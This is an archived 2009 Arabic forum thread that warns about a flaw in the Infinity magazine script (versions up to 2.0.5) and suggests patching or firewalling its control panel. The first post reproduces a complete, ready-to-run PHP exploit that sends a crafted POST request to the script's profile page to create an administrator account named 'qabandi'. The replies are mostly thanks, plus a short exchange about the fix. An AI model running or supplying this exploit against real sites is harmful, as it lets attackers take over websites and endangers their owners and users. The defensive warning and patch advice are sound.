منتديات بعد حيي

منتديات بعد حيي (https://www.b3b7.com/vb/index.php)
-   منتدى الكمبيوتر والإنترنت - وتطوير المنتديات (https://www.b3b7.com/vb/forumdisplay.php?f=98)
-   -   [ ترقيع ] ثغرة بمجلة الانفنتي ! (https://www.b3b7.com/vb/showthread.php?t=49341)

مخاوي الكيبورد 08-16-2009 01:45 AM

[ ترقيع ] ثغرة بمجلة الانفنتي !
 
http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit

كود PHP:

          <?php
print_r
('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _POST <3                    /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Owned :)                  |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|       :: Stupid vulnerability in a good script :( tsk tsk                    |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                                    Sec-Code.com
                                    

USAGE: php whatever.php localhost /infinity/


'
);

ini_set("max_execution_time",0);

 function 
QABANDI($victim,$vic_dir){
$host $victim;
$p "http://".$host.$vic_dir;




          
$data   ="name=qabandi&password=qabandi&conf_password=qabandi&email=[COLOR=red] ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) [/COLOR]&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
          
$packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
          
$packet.="****************************-Type: application/x-www-form-urlencoded\r\n";
          
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          
$packet.="Pragma: no-cache\r\n";
          
$packet.="****************************-Length: ".strlen($data)."\r\n";
          
$packet.="Connection: Close\r\n\r\n";
          
$packet.=$data;



         
//print $packet;
    
$o = @fsockopen($host80);
    if(!
$o){
        echo 
"\n[x] No response...\n";
        die;
    }
    
    
fputs($o$packet);
    while (!
feof($o)) $data .= fread($o1024);
    
fclose($o);
    
    
$_404 strstr$data"HTTP/1.1 404 Not Found" );
    if ( !empty(
$_404) ){
        echo 
"\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
    
        
$_401 strstr$data"401 Authorization Required" );
    if ( !empty(
$_401) ){
        echo 
"\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
                                          
                                           echo 
"Admin created !\n\nUsername: qabandi\npassword: qabandi";

 }

$host1 $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);

die;


?>

حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد

مشعل الليل 08-16-2009 02:57 AM

شكرا على التنبيه بارك فيك اخي

نورالدنيا 08-16-2009 03:46 AM


[align=center]


:h73::h73:
الله يكفينا شرها

ومشكور اخوي على التنبيه
http://www.b3b7.com/vb/imgcache/20300.imgcache.png


[/align]

الخريصي 08-16-2009 04:40 AM

:xx:شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

محبة الجنه 08-16-2009 05:46 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

شموخ المحبة 08-16-2009 12:29 PM

مشكورة الله يعطيك العافية

مناهي 08-16-2009 05:21 PM

الله يستر
مخاوي الكيبورد
مشكور على التنبية
والله يعطيكـ العافية

الاخينع 08-17-2009 03:53 AM

لازم الاخذ بالحيطه والحذرتقبل مروري مع كل تقدير واحترام لشخصكم الكريم:xx:

جـــود 08-17-2009 06:30 AM

مخاوي الكيبورد

الله يكفينا شرها

مشكووور على التنبيه

جود

طروادا 08-17-2009 07:55 AM

استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
:xx:دمت مبدعاً استاذ مخاوي:xx:

مخاوي الكيبورد 08-17-2009 08:52 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة طروادا (المشاركة 610774)
استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
:xx:دمت مبدعاً استاذ مخاوي:xx:

اهلين بالحبيب ..
اقصد بالترقيع الموقت حل مبدئ للثغرة من نظري يكون سهل على كل مستخدمين المجله
السيرفر ماله اي دخل لو نقلت الموقع المصاب على اقوى سيرفر بالعالم راح يضل مصاب
لان الثغرة بملفات الموقع ماهي بالسيرفر ..
طبعا شركة ابعاد المعلومات منتجة مجلة انفنتي اخبرها طرحت اكواد برمجيها ( ترقيع ) للملف المصاب بالسكربت
على مايقولون كل الطرق تودئ الى روما ( جدار ناري او ترقيع برمجي ) كلها تمنع تطبيق الثغرة اعلاه ..
نورت

الـ ساري 08-18-2009 04:45 PM

بارك فيك ورعاك وحفظك الله على التحذير
الذي عانينا منه
بيوم من الايام
اشكرك وفقك الله ودمت لنا غالينا

ياسر العلهوب 08-18-2009 10:56 PM

شكرا على التنبيه بارك فيك اخي


تنوره 08-20-2009 04:09 AM

:xx:موفق بإذن الله ... لك مني أجمل تحية .

حايليه 08-21-2009 01:54 AM

تسلم ومشكور اخوي على التنبيه


الساعة الآن 12:08 AM.

Powered by vBulletin® Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. TranZ By Almuhajir
HêĽм √ 3.2 OPS BY: ! ωαнαм ! © 2010

mamnoa 5.0 by Abdulrahman Al-Rowaily